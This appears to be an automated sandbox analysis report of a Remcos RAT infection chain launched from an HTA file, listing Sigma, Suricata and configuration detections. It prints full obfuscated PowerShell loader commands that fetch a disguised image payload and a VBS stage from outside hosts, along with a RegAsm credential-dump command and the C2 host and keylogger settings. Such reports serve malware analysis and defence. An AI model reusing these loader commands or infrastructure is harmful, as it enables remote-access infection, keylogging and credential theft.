'KCd0ZycrJzRpbWFnZVVybCA9IE5sTGh0dCcrJ3BzOi8vJysncmF3LmdpdGh1YnVzZXJjbycrJ250ZW50LmNvbS9DcnlwdGVyc0FuZFRvb2xzT2ZpY2lhbC9aSVAvcmVmcy9oZScrJ2FkJysncy9tYWluL0QnKydldGFoTm90ZV9WLmpwZyBObEw7dGc0d2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDt0ZzRpbWFnZUInKyd5dGVzID0gdGc0d2ViQ2xpZW50LkRvd25sb2EnKydkRGF0YSh0ZzRpbWFnZVVybCk7dGc0aW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kJysnaW5nXTo6VVRGOC5HZXRTdHJpbmcodGc0aW1hZ2VCeXRlcyk7dGc0c3RhcnRGbGFnID0gTmxMPDxCQVNFNjRfU1RBUlQ+Pk5sJysnTDt0ZzRlbmRGbGFnID0gTmxMPDxCQVMnKydFNjRfRU5EPj5ObEw7dCcrJ2c0c3RhcnRJbmRleCA9IHRnNGltYWdlVGV4dC5JbmRleE9mKHRnNHN0YXJ0RmxhZyk7dGc0ZW5kSW5kZXggPSB0ZzRpbWFnZVQnKydleHQuSW5kZXhPZih0ZzRlbmRGbGFnKTt0ZzRzdGFydEluZGV4JysnIC1nJysnZSAwIC1hbmQgdGc0ZW5kSW5kZXggLWd0IHRnNHN0YXJ0SW5kZXg7dGc0cycrJ3RhcnRJbmRleCArPSB0ZzRzdGFydEZsYWcuTGVuZ3RoO3RnNGJhc2U2NExlbmd0aCA9IHRnNGVuZEluZGV4IC0gdGc0c3RhcnRJbmRleDt0ZzRiYXNlNjRDb21tYW5kJysnID0gdGc0aW1hZ2VUZXh0LlN1YnN0cmluZygnKyd0ZzRzdGFydElu
                      Sigma detected: Dynamic .NET Compilation Via Csc.EXE
                      Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\p44lx5ym\p44lx5ym.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\p44lx5ym\p44lx5ym.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\SYSTEM32\wInDoWspoWERsheLl\v1.0\pOwerSHelL.EXe" "PowErsheLl.ExE -Ex byPaSs -nop -W 1 -c DevicECrEdentiaLdEploymeNt.eXe ; IEx($(IeX('[SYStEm.tEXt.enCoDing]'+[cHaR]58+[chaR]58+'Utf8.gEtsTRiNg([sYstEM.CoNVErT]'+[cHar]58+[ChaR]0x3a+'FromBaSE64sTrIng('+[chAR]34+'JEcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFERC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNYkVyZGVmaW5JdGlPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHbWZScFV0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUE1kWHZOLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRnQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXh4c2lBU0hmLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeEhXU3kpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZ3VNcGJiZUdkVyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9NenpHY015TiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJEc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuNDAvNDUwL3NlZXRoZWJlc3RwcmljZXdpdGhnb29kY29va2llc21lLnRJRiIsIiRFblY6QVBQREFUQVxzZWV0aGViZXN0cHJpY2V3aXRoZ29vZGNvb2tpZXNtLnZiUyIsMCwwKTtzVGFSVC1zTGVlUCgzKTtTVGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxzZWV0aGViZXN0cHJpY2V3aXRoZ29vZGNvb2tpZXNtLnZiUyI='+[ChAr]0X22+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3812, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\p44lx5ym\p44lx5ym.cmdline", ProcessId: 5016, ProcessName: csc.exe
                      Sigma detected: Potential Binary Or Script Dropper Via PowerShell
                      Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3812, TargetFilename: C:\Users\user\AppData\Roaming\seethebestpricewithgoodcookiesm.vbS
                      Sigma detected: Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location
                      Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\icthiyu", CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\icthiyu", CommandLine|base64offset|contains: ^, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe", ParentImage: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ParentProcessId: 3092, ParentProcessName: RegAsm.exe, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\icthiyu", ProcessId: 4072, ProcessName: RegAsm.exe
                      Sigma detected: Usage Of Web Request Commands And Cmdlets
                      Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('tg'+'4imageUrl = NlLhtt'+'ps://'+'raw.githubuserco'+'ntent.com/CryptersAndToolsOficial/ZIP/refs/he'+'ad'+'s/main/D'+'etahNote_V.jpg NlL;tg4webClient = New-Object System.Net.WebClient;tg4imageB'+'ytes = tg4webClient.Downloa'+'dData(tg4imageUrl);tg4imageText = [System.Text.Encod'+'ing]::UTF8.GetString(tg4imageBytes);tg4startFlag = NlL<<BASE64_START>>Nl'+'L;tg4endFlag = NlL<<BAS'+'E64_END>>NlL;t'+'g4startIndex = tg4imageText.IndexOf(tg4startFlag);tg4endIndex = tg4imageT'+'ext.IndexOf(tg4endFlag);tg4startIndex'+' -g'+'e 0 -and tg4endIndex -gt tg4startIndex;tg4s'+'tartIndex += tg4startFlag.Length;tg4base64Length = tg4endIndex - tg4startIndex;tg4base64Command'+' = tg4imageText.Substring('+'tg4startIndex, tg4base64Length);tg4commandBytes = [System.Convert'+']::F'+'romBase64String(tg4base64Command);tg4loadedAssembl'+'y = [System.Reflection.Assembly]::Load(tg4commandBy'+'te'+'s);tg4vaiMethod = [dnlib.IO.Home].GetMethod(NlLVA'+'INlL);tg4vai'+'Method'+'.Invoke(tg4null, @(Nl'+'Ltxt.ECCFRR/054/04.022.3.291//:ptthNl'+'L, NlLdesat'+'ivadoN'+'lL, NlLdesativadoNlL, NlLdesativadoNlL, NlLRegAsmNlL, NlLdesativadoNlL, NlLdesativadoNlL));').REPlAce('tg4',[sTrInG][chAr]36).REPlAce(([chAr]78+[chAr]108+[chAr]76),[sTrInG][chAr]39) | . ((gV '*MdR*').Name[3,11,2]-JoIN'')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('tg'+'4imageUrl = NlLhtt'+'ps://'+'raw.githubuserco'+'ntent.com/CryptersAndToolsOficial/ZIP/refs/he'+'ad'+'s/main/D'+'etahNote_V.jpg NlL;tg4webClient = New-Object System.Net.WebClient;tg4imageB'+'ytes = tg4webClient.Downloa'+'dData(tg4imageUrl);tg4imageText = [System.Text.Encod'+'ing]::UTF8.GetString(tg4imageBytes);tg4startFlag = NlL<<BASE64_START>>Nl'+'L;tg4endFlag = NlL<<BAS'+'E64_END>>NlL;t'+'g4startIndex = tg4imageText.IndexOf(tg4startFlag);tg4endIndex = tg4imageT'+'ext.IndexOf(tg4endFlag);tg4startIndex'+' -g'+'e 0 -and tg4endIndex -gt tg4startIndex;tg4s'+'tartIndex += tg4startFlag.Length;tg4base64Length = tg4endIndex - tg4startIndex;tg4base64Command'+' = tg4imageText.Substring('+'tg4startIndex, tg4base64Length);tg4commandBytes = [System.Convert'+']::F'+'romBase64String(tg4base64Command);tg4loadedAssembl'+'y = [System.Reflection.Assembly]::Load(tg4commandBy'+'te'+'s);tg4vaiMethod = [dnlib.IO.Home].GetMethod(NlLVA'+'INlL);tg4vai'+'Method'+'.Invoke(tg4null, @(Nl'+'Ltxt.ECCFRR/054/04.022.3.291//:ptthNl'+'L, NlLdesat'+'ivadoN'+'lL, NlLdesativadoNlL, NlLdesativadoNlL, NlLRegAsmNlL, NlLdesativadoNlL, NlLdesativadoNlL));').REPlAce('tg4',[sTrInG][chAr]36).REPlAce(([chAr]78+[chAr]108+[chAr]76),[sTrInG][chAr]39) | . ((gV '*MdR*').Name[3,11,2]-JoIN'')", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe,
                      Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                      Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestpricewithgoodcookiesm.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestpricewithgoodcookiesm.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Windows\SYSTEM32\wInDoWspoWERsheLl\v1.0\pOwerSHelL.EXe" "PowErsheLl.ExE -Ex byPaSs -nop -W 1 -c DevicECrEdentiaLdEploymeNt.eXe ; IEx($(IeX('[SYStEm.tEXt.enCoDing]'+[cHaR]58+[chaR]58+'Utf8.gEtsTRiNg([sYstEM.CoNVErT]'+[cHar]58+[ChaR]0x3a+'FromBaSE64sTrIng('+[chAR]34+'JEcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFERC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNYkVyZGVmaW5JdGlPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHbWZScFV0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUE1kWHZOLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRnQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXh4c2lBU0hmLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeEhXU3kpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZ3VNcGJiZUdkVyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9NenpHY015TiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJEc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuNDAvNDUwL3NlZXRoZWJlc3RwcmljZXdpdGhnb29kY29va2llc21lLnRJRiIsIiRFblY6QVBQREFUQVxzZWV0aGViZXN0cHJpY2V3aXRoZ29vZGNvb2tpZXNtLnZiUyIsMCwwKTtzVGFSVC1zTGVlUCgzKTtTVGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxzZWV0aGViZXN0cHJpY2V3aXRoZ29vZGNvb2tpZXNtLnZiUyI='+[ChAr]0X22+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3812, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestpricewithgoodcookiesm.vbS" , ProcessId: 7156, ProcessName: wscript.exe
                      Sigma detected: Dynamic CSharp Compile Artefact
                      Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3812, TargetFilename: C:\Users\user\AppData\Local\Temp\p44lx5ym\p44lx5ym.cmdline
                      Sigma detected: Non Interactive PowerShell Process Spawned
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\SYSTEM32\wInDoWspoWERsheLl\v1.0\pOwerSHelL.EXe" "PowErsheLl.ExE -Ex byPaSs -nop -W 1 -c DevicECrEdentiaLdEploymeNt.eXe ; IEx($(IeX('[SYStEm.tEXt.enCoDing]'+[cHaR]58+[chaR]58+'Utf8.gEtsTRiNg([sYstEM.CoNVErT]'+[cHar]58+[ChaR]0x3a+'FromBaSE64sTrIng('+[chAR]34+'JEcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFERC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNYkVyZGVmaW5JdGlPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHbWZScFV0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUE1kWHZOLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRnQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXh4c2lBU0hmLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeEhXU3kpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZ3VNcGJiZUdkVyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9NenpHY015TiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJEc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuNDAvNDUwL3NlZXRoZWJlc3RwcmljZXdpdGhnb29kY29va2llc21lLnRJRiIsIiRFblY6QVBQREFUQVxzZWV0aGViZXN0cHJpY2V3aXRoZ29vZGNvb2tpZXNtLnZiUyIsMCwwKTtzVGFSVC1zTGVlUCgzKTtTVGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxzZWV0aGViZXN0cHJpY2V3aXRoZ29vZGNvb2tpZXNtLnZiUyI='+[ChAr]0X22+'))')))", CommandLine: "C:\Windows\SYSTEM32\wInDoWspoWERsheLl\v1.0\pOwerSHelL.EXe" "PowErsheLl.ExE -Ex byPaSs -nop -W 1 -c DevicECrEdentiaLdEploymeNt.eXe ; IEx($(IeX('[SYStEm.tEXt.enCoDing]'+[cHaR]58+[chaR]58+'Utf8.gEtsTRiNg([sYstEM.CoNVErT]'+[cHar]58+[ChaR]0x3a+'FromBaSE64sTrIng('+[chAR]34+'JEcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFERC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNYkVyZGVmaW5JdGlPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHbWZScFV0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUE1kWHZOLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRnQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXh4c2lBU0hmLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeEhXU3kpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZ3VNcGJiZUdkVyIgICAgICAgICAgICAgICAgICAgICAgICAgICA
                      Sigma detected: Potential Encoded PowerShell Patterns In CommandLine
                      Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('tg'+'4imageUrl = NlLhtt'+'ps://'+'raw.githubuserco'+'ntent.com/CryptersAndToolsOficial/ZIP/refs/he'+'ad'+'s/main/D'+'etahNote_V.jpg NlL;tg4webClient = New-Object System.Net.WebClient;tg4imageB'+'ytes = tg4webClient.Downloa'+'dData(tg4imageUrl);tg4imageText = [System.Text.Encod'+'ing]::UTF8.GetString(tg4imageBytes);tg4startFlag = NlL<<BASE64_START>>Nl'+'L;tg4endFlag = NlL<<BAS'+'E64_END>>NlL;t'+'g4startIndex = tg4imageText.IndexOf(tg4startFlag);tg4endIndex = tg4imageT'+'ext.IndexOf(tg4endFlag);tg4startIndex'+' -g'+'e 0 -and tg4endIndex -gt tg4startIndex;tg4s'+'tartIndex += tg4startFlag.Length;tg4base64Length = tg4endIndex - tg4startIndex;tg4base64Command'+' = tg4imageText.Substring('+'tg4startIndex, tg4base64Length);tg4commandBytes = [System.Convert'+']::F'+'romBase64String(tg4base64Command);tg4loadedAssembl'+'y = [System.Reflection.Assembly]::Load(tg4commandBy'+'te'+'s);tg4vaiMethod = [dnlib.IO.Home].GetMethod(NlLVA'+'INlL);tg4vai'+'Method'+'.Invoke(tg4null, @(Nl'+'Ltxt.ECCFRR/054/04.022.3.291//:ptthNl'+'L, NlLdesat'+'ivadoN'+'lL, NlLdesativadoNlL, NlLdesativadoNlL, NlLRegAsmNlL, NlLdesativadoNlL, NlLdesativadoNlL));').REPlAce('tg4',[sTrInG][chAr]36).REPlAce(([chAr]78+[chAr]108+[chAr]76),[sTrInG][chAr]39) | . ((gV '*MdR*').Name[3,11,2]-JoIN'')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('tg'+'4imageUrl = NlLhtt'+'ps://'+'raw.githubuserco'+'ntent.com/CryptersAndToolsOficial/ZIP/refs/he'+'ad'+'s/main/D'+'etahNote_V.jpg NlL;tg4webClient = New-Object System.Net.WebClient;tg4imageB'+'ytes = tg4webClient.Downloa'+'dData(tg4imageUrl);tg4imageText = [System.Text.Encod'+'ing]::UTF8.GetString(tg4imageBytes);tg4startFlag = NlL<<BASE64_START>>Nl'+'L;tg4endFlag = NlL<<BAS'+'E64_END>>NlL;t'+'g4startIndex = tg4imageText.IndexOf(tg4startFlag);tg4endIndex = tg4imageT'+'ext.IndexOf(tg4endFlag);tg4startIndex'+' -g'+'e 0 -and tg4endIndex -gt tg4startIndex;tg4s'+'tartIndex += tg4startFlag.Length;tg4base64Length = tg4endIndex - tg4startIndex;tg4base64Command'+' = tg4imageText.Substring('+'tg4startIndex, tg4base64Length);tg4commandBytes = [System.Convert'+']::F'+'romBase64String(tg4base64Command);tg4loadedAssembl'+'y = [System.Reflection.Assembly]::Load(tg4commandBy'+'te'+'s);tg4vaiMethod = [dnlib.IO.Home].GetMethod(NlLVA'+'INlL);tg4vai'+'Method'+'.Invoke(tg4null, @(Nl'+'Ltxt.ECCFRR/054/04.022.3.291//:ptthNl'+'L, NlLdesat'+'ivadoN'+'lL, NlLdesativadoNlL, NlLdesativadoNlL, NlLRegAsmNlL, NlLdesativadoNlL, NlLdesativadoNlL));').REPlAce('tg4',[sTrInG][chAr]36).REPlAce(([chAr]78+[chAr]108+[chAr]76),[sTrInG][chAr]39) | . ((gV '*MdR*').Name[3,11,2]-JoIN'')", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe,

                      Data Obfuscation

                      barindex
                      Sigma detected: Dot net compiler compiles file from suspicious location
                      Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\p44lx5ym\p44lx5ym.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\p44lx5ym\p44lx5ym.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\SYSTEM32\wInDoWspoWERsheLl\v1.0\pOwerSHelL.EXe" "PowErsheLl.ExE -Ex byPaSs -nop -W 1 -c DevicECrEdentiaLdEploymeNt.eXe ; IEx($(IeX('[SYStEm.tEXt.enCoDing]'+[cHaR]58+[chaR]58+'Utf8.gEtsTRiNg([sYstEM.CoNVErT]'+[cHar]58+[ChaR]0x3a+'FromBaSE64sTrIng('+[chAR]34+'JEcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFERC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNYkVyZGVmaW5JdGlPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHbWZScFV0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUE1kWHZOLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRnQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXh4c2lBU0hmLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeEhXU3kpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZ3VNcGJiZUdkVyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9NenpHY015TiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJEc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuNDAvNDUwL3NlZXRoZWJlc3RwcmljZXdpdGhnb29kY29va2llc21lLnRJRiIsIiRFblY6QVBQREFUQVxzZWV0aGViZXN0cHJpY2V3aXRoZ29vZGNvb2tpZXNtLnZiUyIsMCwwKTtzVGFSVC1zTGVlUCgzKTtTVGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxzZWV0aGViZXN0cHJpY2V3aXRoZ29vZGNvb2tpZXNtLnZiUyI='+[ChAr]0X22+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3812, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\p44lx5ym\p44lx5ym.cmdline", ProcessId: 5016, ProcessName: csc.exe

                      Stealing of Sensitive Information

                      barindex
                      Sigma detected: Remcos
                      Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ProcessId: 3092, TargetFilename: C:\ProgramData\remcos\logs.dat

                      Suricata Signatures

                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-10-14T11:36:13.997130+020020204231Exploit Kit Activity Detected192.3.220.4080192.168.2.549708TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-10-14T11:36:13.997130+020020204251Exploit Kit Activity Detected192.3.220.4080192.168.2.549708TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-10-14T11:36:15.871804+020020365941Malware Command and Control Activity Detected192.168.2.549714135.148.195.2486875TCP
                      2024-10-14T11:36:16.762466+020020365941Malware Command and Control Activity Detected192.168.2.549722135.148.195.2486875TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-10-14T11:36:13.042897+020020490381A Network Trojan was detected185.199.111.133443192.168.2.549707TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-10-14T11:36:16.900244+020028033043Unknown Traffic192.168.2.549723178.237.33.5080TCP

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Found malware configuration
                      Source: 0000000B.00000002.4471996980.00000000013B0000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": "idabo.duckdns.org:6875:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-I89M3S", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
                      Multi AV Scanner detection for submitted file
                      Source: na.htaVirustotal: Detection: 26%Perma Link
                      Yara detected Remcos RAT
